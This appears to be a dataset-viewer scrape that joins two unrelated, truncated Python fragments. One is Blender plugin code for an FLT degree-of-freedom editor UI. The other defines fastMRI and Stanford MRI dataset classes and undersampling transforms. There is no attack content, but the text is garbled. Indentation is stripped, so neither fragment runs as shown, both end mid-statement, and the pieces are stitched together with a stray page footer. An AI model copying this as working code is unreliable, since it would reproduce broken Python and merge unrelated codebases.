if evt == evcode["DOF_SCALEY"]:
if DOF_SCALEY.val == True:
set_lockmask(lockyscale)
else:
clear_lockmask(lockyscale)
if evt == evcode["DOF_SCALEZ"]:
if DOF_SCALEZ.val == True:
set_lockmask(lockzscale)
else:
clear_lockmask(lockzscale)
#do translation buttons
if evt == evcode["DOF_MIN_TRANSX"]:
set_prop(14, xmin, DOF_MIN_TRANSX.val)
if evt == evcode["DOF_MAX_TRANSX"]:
set_prop(14,xmax, DOF_MAX_TRANSX.val)
if evt == evcode["DOF_STEP_TRANSX"]:
set_prop(14,xstep, DOF_STEP_TRANSX.val)
if evt == evcode["DOF_MIN_TRANSY"]:
set_prop(14, ymin, DOF_MIN_TRANSY.val)
if evt == evcode["DOF_MAX_TRANSY"]:
set_prop(14,ymax, DOF_MAX_TRANSY.val)
if evt == evcode["DOF_STEP_TRANSY"]:
set_prop(14,ystep, DOF_STEP_TRANSY.val)
if evt == evcode["DOF_MIN_TRANSZ"]:
set_prop(14, zmin, DOF_MIN_TRANSZ.val)
if evt == evcode["DOF_MAX_TRANSZ"]:
set_prop(14, zmax, DOF_MAX_TRANSZ.val)
if evt == evcode["DOF_STEP_TRANSZ"]:
set_prop(14, zstep, DOF_STEP_TRANSZ.val)
#do rotation buttons
if evt == evcode["DOF_MIN_ROTX"]:
set_prop(14, pitchmin, DOF_MIN_ROTX.val)
if evt == evcode["DOF_MAX_ROTX"]:
set_prop(14, pitchmax, DOF_MAX_ROTX.val)
if evt == evcode["DOF_STEP_ROTX"]:
set_prop(14, pitchstep, DOF_STEP_ROTX.val)
if evt == evcode["DOF_MIN_ROTY"]:
set_prop(14, rollmin, DOF_MIN_ROTY.val)
if evt == evcode["DOF_MAX_ROTY"]:
set_prop(14, rollmax, DOF_MAX_ROTY.val)
if evt == evcode["DOF_STEP_ROTY"]:
set_prop(14, rollstep, DOF_STEP_ROTY.val)
if evt == evcode["DOF_MIN_ROTZ"]:
set_prop(14, yawmin, DOF_MIN_ROTZ.val)
if evt == evcode["DOF_MAX_ROTZ"]:
set_prop(14, yawmax, DOF_MAX_ROTZ.val)
if evt == evcode["DOF_STEP_ROTZ"]:
set_prop(14, yawstep, DOF_STEP_ROTZ.val)
#do scale buttons
if evt == evcode["DOF_MIN_SCALEX"]:
set_prop(14, xscalemin, DOF_MIN_SCALEX.val)
if evt == evcode["DOF_MAX_SCALEX"]:
set_prop(14, xscalemax, DOF_MAX_SCALEX.val)
if evt == evcode["DOF_STEP_SCALEX"]:
set_prop(14, xscalestep, DOF_STEP_SCALEX.val)
if evt == evcode["DOF_MIN_SCALEY"]:
set_prop(14, yscalemin, DOF_MIN_SCALEY.val)
if evt == evcode["DOF_MAX_SCALEY"]:
set_prop(14, yscalemax, DOF_MAX_SCALEY.val)
if evt == evcode["DOF_STEP_SCALEY"]:
set_prop(14, yscalestep, DOF_STEP_SCALEY.val)
if evt == evcode["DOF_MIN_SCALEZ"]:
set_prop(14, zscalemin, DOF_MIN_SCALEZ.val)
if evt == evcode["DOF_MAX_SCALEZ"]:
set_prop(14, zscalemax, DOF_MAX_SCALEZ.val)
if evt == evcode["DOF_STEP_SCALEZ"]:
set_prop(14, zscalestep, DOF_STEP_SCALEZ.val)
Draw.Redraw(1)
Blender.Window.RedrawAll()
def draw_propsheet(x,y):
#UI buttons
global DOF_MAKE
global DOF_UPDATE
global DOF_DELETE
global DOF_TRANSX
global DOF_TRANSY
global DOF_TRANSZ
global DOF_ROTX
global DOF_ROTY
global DOF_ROTZ
global DOF_SCALEX
global DOF_SCALEY
global DOF_SCALEZ
global DOF_MIN_TRANSX
global DOF_MIN_TRANSY
global DOF_MIN_TRANSZ
global DOF_MIN_ROTX
global DOF_MIN_ROTY
global DOF_MIN_ROTZ
global DOF_MIN_SCALEX
global DOF_MIN_SCALEY
global DOF_MIN_SCALEZ
global DOF_MAX_TRANSX
global DOF_MAX_TRANSY
global DOF_MAX_TRANSZ
global DOF_MAX_ROTX
global DOF_MAX_ROTY
global DOF_MAX_ROTZ
global DOF_MAX_SCALEX
global DOF_MAX_SCALEY
global DOF_MAX_SCALEZ
global DOF_STEP_TRANSX
global DOF_STEP_TRANSY
global DOF_STEP_TRANSZ
global DOF_STEP_ROTX
global DOF_STEP_ROTY
global DOF_STEP_ROTZ
global DOF_STEP_SCALEX
global DOF_STEP_SCALEY
global DOF_STEP_SCALEZ
#labels
global DOF_ROTSTRING
global DOF_TRANSTRING
global DOF_SCALESTRING
global DOF_EDITLABEL
#masks
global lockxtrans
global lockytrans
global lockztrans
global lockxrot
global lockyrot
global lockzrot
global lockxscale
global lockyscale
global lockzscale
global zmin
global zmax
global zcur
global zstep
global ymin
global ymax
global ycur
global ystep
global xmin
global xmax
global xcur
global xstep
global pitchmin
global pitchmax
global pitchcur
global pitchstep
global rollmin
global rollmax
global rollcur
global rollstep
global yawmin
global yawmax
global yawcur
global yawstep
global zscalemin
global zscalemax
global zscalecur
global zscalestep
global yscalemin
global yscalemax
global yscalecur
global yscalestep
global xscalemin
global xscalemax
global xscalecur
global xscalestep
global evcode
state = update_state()
row_height = 20
toggle_width = 50
input_width = 100
pad = 10
origx = x
origy = (row_height * 15) + (pad * 15)
#editor label
x = origx
y = origy
#y = y - (row_height + pad)
DOF_EDITLABEL = Blender.Draw.Label("FLT Degree of Freedom Editor", x, y, 200, row_height)
#draw Translation limits
x = origx
y = y- (row_height + pad)
DOF_TRANSTRING = Blender.Draw.Label("Translation Limits", x, y, input_width, row_height)
#X limits
x = origx
y = y- (row_height + pad)
DOF_TRANSX = Blender.Draw.Toggle("LimX", evcode["DOF_TRANSX"], x, y, toggle_width, row_height, get_lockmask(lockxtrans), "")
x = x + (toggle_width + pad)
DOF_MIN_TRANSX = Blender.Draw.Number("MinX", evcode["DOF_MIN_TRANSX"], x, y, input_width, row_height,get_prop(14,xmin), -1000000.0, 1000000.0, "")
x = x + (input_width + pad)
DOF_MAX_TRANSX = Blender.Draw.Number("MaxX", evcode["DOF_MAX_TRANSX"], x, y, input_width, row_height,get_prop(14,xmax), -1000000.0, 1000000.0, "")
x = x + (input_width + pad)
DOF_STEP_TRANSX = Blender.Draw.Number("StepX", evcode["DOF_STEP_TRANSX"], x, y, input_width, row_height,get_prop(14,xstep), -1000000.0, 1000000.0, "")
#Y limits
x = origx
y = y- (row_height + pad)
DOF_TRANSY = Blender.Draw.Toggle("LimY", evcode["DOF_TRANSY"], x, y, toggle_width, row_height, get_lockmask(lockytrans), "")
x = x + (toggle_width + pad)
DOF_MIN_TRANSY = Blender.Draw.Number("MinY", evcode["DOF_MIN_TRANSY"], x, y, input_width, row_height, get_prop(14,ymin), -1000000.0, 1000000.0, "")
x = x + (input_width + pad)
DOF_MAX_TRANSY = Blender.Draw.Number("MaxY", | |
import numpy as np
import os
import pickle
from typing import Dict, Optional, Tuple, Union, Mapping, Callable, Set
import torch
from torch.utils.data import Dataset, DataLoader
from torchvision.transforms import RandomCrop
from fastmri import complex_abs, ifft2c
from fastmri.data import SliceDataset
from fastmri.data import transforms as T
from fastmri.data.subsample import RandomMaskFunc, create_mask_for_mask_type
from kernprior import paths
from kernprior import transforms
from kernprior import utils
class FastMRIDataset(SliceDataset):
"""
fastMRI Dataset (https://fastmri.org/dataset/).
"""
def __init__(
self,
mid_slice_range: Optional[int] = None,
acquisition: Optional[str] = None,
subset: Optional[set] = None,
adversarially_filtered: bool = False,
**kwargs,
):
"""
Args:
mid_slice_range: Optional; If provided, only add the middle slice +/- mid_slice_range
of each volume to the dataset.
acquisition: Optional; If provided, only include examples from this acquisition type
('including_fat' or 'excluding_fat' for knees) in the dataset.
subset: Optional; Only files from subset are included.
adversarially_filtered: Optional; Whether to only include files from the fastMRI-A dataset
(see https://arxiv.org/abs/2102.06103).
kwargs: Keyword arguments are passed to fastmri.data.SliceDataset.
"""
super().__init__(**kwargs)
if mid_slice_range is not None:
# each example is a tuple with 3 elements: (file_path, slice_num, metadata)
file_path_to_mid_slice_indices = self._get_file_path_to_mid_slice_indices(mid_slice_range)
self.examples = [ex for ex in self.examples if ex[1] in file_path_to_mid_slice_indices[ex[0]]]
if acquisition:
file_path_to_acquisition = self._get_file_path_to_acquisition()
self.examples = [ex for ex in self.examples if file_path_to_acquisition[ex[0]] == acquisition]
if subset:
self.examples = [ex for ex in self.examples if ex[0].name in subset]
if adversarially_filtered:
fastmri_a_dataset = get_fastmri_a_dataset()
self.examples = [
ex
for ex in self.examples
if (ex[0].name, ex[1]) in fastmri_a_dataset
]
def _get_file_path_to_mid_slice_indices(self, mid_slice_range: int):
file_path_to_mid_slice_indices = {}
for file_path, *_ in self.examples:
if file_path not in file_path_to_mid_slice_indices:
num_slices = utils.get_num_slices(file_path)
file_path_to_mid_slice_indices[file_path] = set(utils.get_mid_slice_indices(num_slices, mid_slice_range))
return file_path_to_mid_slice_indices
def _get_file_path_to_acquisition(self):
file_path_to_acquisition = {}
for file_path, *_ in self.examples:
if file_path not in file_path_to_acquisition:
file_path_to_acquisition[file_path] = utils.get_acquisition(file_path)
return file_path_to_acquisition
class StanfordDataset(Dataset):
"""
Stanford Dataset (collected by Darestani et al. https://arxiv.org/abs/2102.06103).
"""
def __init__(self, root: str, transform: Optional[Callable] = None, download: bool = False):
"""
Args:
root: Path to the dataset.
transform: Optional; A callable object that pre-processes the data. The transform should take
'file_name', 'kspace', 'target' as inputs.
download: Optional; If True, downloads the dataset and saves it at root.
If the dataset is already downloaded, it is not downloaded again.
"""
self.root = root
self.transform = transform
self.examples = []
if not os.path.exists(self.root):
if download:
utils.download(url='https://rice.box.com/shared/static/4xk6nef26vk8uyes4wymtob5pbmcfdyd',
save_path=self.root)
else:
raise RuntimeError('Dataset not found. Use download=True to download.')
with open(self.root, 'rb') as f:
dataset = pickle.load(f)
for file_name, sample in dataset.items():
self.examples.append((file_name, sample['kspace'], sample['reconstruction_rss']))
def __len__(self):
return len(self.examples)
def __getitem__(self, i: int):
sample = self.examples[i]
if self.transform is not None:
sample = self.transform(*sample)
return sample
class TrainDataTransform:
"""
Data transform for training a flow-based prior on patches of MRI data. Used as 'transform' for FastMRIDataset.
"""
def __init__(
self,
patch_size: Union[int, Tuple[int], Tuple[int, int]],
challenge: str,
sens_params: str,
reduce_precise: bool,
):
"""
Args:
patch_size: The patch size of the prior.
challenge: One of ('singlecoil', 'multicoil').
sens_params: Parameters that get directly passed to ecalib from the Bart toolbox.
See utils.get_sens_maps for details.
reduce_precise: Whether to replace the magnitude of the MVUE image with the RSS estimate. Only relevant
if challenge == 'multicoil'.
"""
self.random_crop = RandomCrop(patch_size)
self.challenge = challenge
self.sens_params = sens_params
self.center_crop_size = (320, 320)
self.reduce_precise = reduce_precise
def __call__(
self,
kspace: np.ndarray,
mask: np.ndarray,
target: np.ndarray,
attrs: Dict,
file_name: str,
slice_num: int,
) -> Tuple[torch.Tensor, int]:
"""
Args:
kspace: kspace of shape (num_coils, H, W) for multi-coil data or (H, W) for single-coil data.
mask: Mask from the test dataset.
target: Target image.
attrs: Acquisition related information stored in the HDF5 object.
file_name: File name.
slice_num: Index of the slice.
Returns:
tuple containing:
patch: Complex-valued patch of shape (2, patch_H, patch_W), i.e. real and imaginary dims are stacked as
channel dim.
slice_num: Index of the slice.
Notes:
Docstring based on https://github.com/facebookresearch/fastMRI/blob/master/fastmri/data/transforms.py
"""
kspace = T.to_tensor(kspace)
target = ifft2c(kspace)
target = T.complex_center_crop(target, self.center_crop_size)
if self.challenge == 'multicoil':
# combine individual coil images into a single complex-valued image
sens_maps = utils.get_cached_sens_maps(kspace, file_name, slice_num, self.sens_params)
sens_maps = T.complex_center_crop(sens_maps, self.center_crop_size)
if self.reduce_precise:
target = transforms.sens_reduce_precise(target, sens_maps)
else:
target = transforms.sens_reduce(target, sens_maps)
target = target / complex_abs(target).max() # normalize
target = target.permute(2, 0, 1) # complex dim as channel dim
patch = self.random_crop(target)
return patch, slice_num
class InferenceDataTransform:
"""
Data transform for obtaining undersampled kspace slices.
"""
def __init__(
self,
mask_type: str,
acceleration: int,
center_fraction: float,
challenge: str,
crop_size: Union[utils.CropSize, Mapping[str, utils.CropSize]],
normalize: bool,
pad_sides: bool = False,
use_seed: bool = True,
):
"""
Args:
mask_type: One of ('random', 'equispaced').
acceleration: The desired undersampling factor.
center_fraction: Fraction of low-frequency columns to be retained.
challenge: One of ('singlecoil', 'multicoil').
crop_size: The kspace is spatially cropped to crop_size before undersampling. If a dimension of crop_size is
None, the kspace does not get cropped in this dimension. If crop_size is a Dict, it should map from
'including_fat' and 'excluding_fat' to a crop_size to use for the respective acquisition type.
normalize: Whether to divide the kspace by the maximum pixel value of the zero-filled reconstruction.
pad_sides: Optional; Whether to pad the sides of the kspace with zeros.
use_seed: Optional; Whether to seed the random number generator used for creating the mask based on the file_name.
"""
self.acceleration = acceleration
self.challenge = challenge
self.crop_size = crop_size
self.normalize = normalize
self.pad_sides = pad_sides
self.use_seed = use_seed
self.mask_func = create_mask_for_mask_type(mask_type,
accelerations=[acceleration],
center_fractions=[center_fraction])
def __call__(
self,
kspace: np.ndarray,
mask: Optional[np.ndarray] = None,
target: Optional[np.ndarray] = None,
attrs: Optional[Dict] = None,
file_name: Optional[str] = None,
slice_num: Optional[int] = None
) -> Tuple[torch.Tensor, torch.Tensor, Optional[torch.Tensor], Optional[str], Optional[int], Optional[str]]:
"""
Args:
kspace: kspace of shape (num_coils, H, W) for multi-coil data or (H, W) for single-coil data.
mask: Optional; Mask from the test dataset.
target: Optional; Target image.
attrs: Optional; Acquisition related information stored in the HDF5 object.
file_name: Optional; File name.
slice_num: Optional; Index of the slice.
Returns:
tuple containing:
masked_kspace: Undersampled kspace.
mask: Undersampling mask used to obtain masked_kspace.
target: Target image.
file_name: File name.
slice_num: Index of the slice.
acquisition: The acquisition type of the measurement.
Notes:
Docstring based on https://github.com/facebookresearch/fastMRI/blob/master/fastmri/data/transforms.py
"""
kspace = T.to_tensor(kspace)
if target is not None:
target = T.to_tensor(target)
kspace_shape_uncropped = kspace.shape
acquisition = utils.from_confusing_terminology(attrs['acquisition']) if attrs else None
if isinstance(self.crop_size, dict):
crop_size = self.crop_size[acquisition] if acquisition == 'including_fat' else self.crop_size['excluding_fat']
else:
crop_size = self.crop_size
if crop_size is not None:
crop_size = utils.get_crop_size(crop_size, kspace.shape)
kspace = transforms.crop_spatially(kspace, crop_size)
if self.pad_sides and kspace.shape[-2] == kspace_shape_uncropped[-2]: # only pad if width dimension was not cropped
padding = (attrs['padding_left'], attrs['padding_right'])
else:
padding = None
seed = utils.get_seed(file_name) if self.use_seed else None
masked_kspace, mask = T.apply_mask(kspace, self.mask_func, seed, padding)
if self.normalize:
masked_kspace = transforms.normalize_kspace(masked_kspace, self.challenge)
return masked_kspace, mask, target, file_name, slice_num, acquisition
class StanfordDataTransform:
"""
Data transform for obtaining undersampled kspace slices from the StanfordDataset.
"""
def __init__(self, acceleration: int, center_fraction: float, normalize: bool, use_seed: bool = True):
"""
Args:
acceleration: The desired undersampling factor.
center_fraction: Fraction of low-frequency columns to be retained.
normalize: Whether to divide the kspace by the maximum pixel value of the zero-filled reconstruction.
use_seed: Optional; Whether to seed the random number generator used for creating the mask based on the file_name.
"""
self.acceleration = acceleration
self.normalize = normalize
self.use_seed = use_seed
self.mask_func = RandomMaskFunc(accelerations=[acceleration], center_fractions=[center_fraction])
def __call__(
self,
file_name: str,
kspace: np.ndarray,
target: np.ndarray
) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor, str, int, str]:
"""
Args:
file_name: File name.
kspace: kspace of shape (num_coils, H, W).
target: Target image.
Returns:
tuple containing:
masked_kspace: Undersampled kspace.
mask: Undersampling mask used to obtain masked_kspace.
target: Target image.
file_name: File name.
slice_num: Index of the slice (-1; included for compatibility with the fastMRI dataset).
acquisition: Indicates that a sample from the Stanford dataset is returned.
"""
kspace = T.to_tensor(kspace)
target = T.to_tensor(target)
kspace = kspace.rot90(1, dims=(-3, -2))
target = target.rot90(1, dims=(0, 1))
seed = utils.get_seed(file_name) if self.use_seed else None
masked_kspace, mask = T.apply_mask(kspace, self.mask_func, seed)
if self.normalize:
masked_kspace = transforms.normalize_kspace(masked_kspace, 'multicoil')
return masked_kspace, mask, target, file_name, -1, 'stanford'
def get_dataloader_train(args, data_dependent_init=False):
"""Based on https://github.com/kamenbliznashki/normalizing_flows"""
dataset = get_mri_dataset_train(args)
batch_size = |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.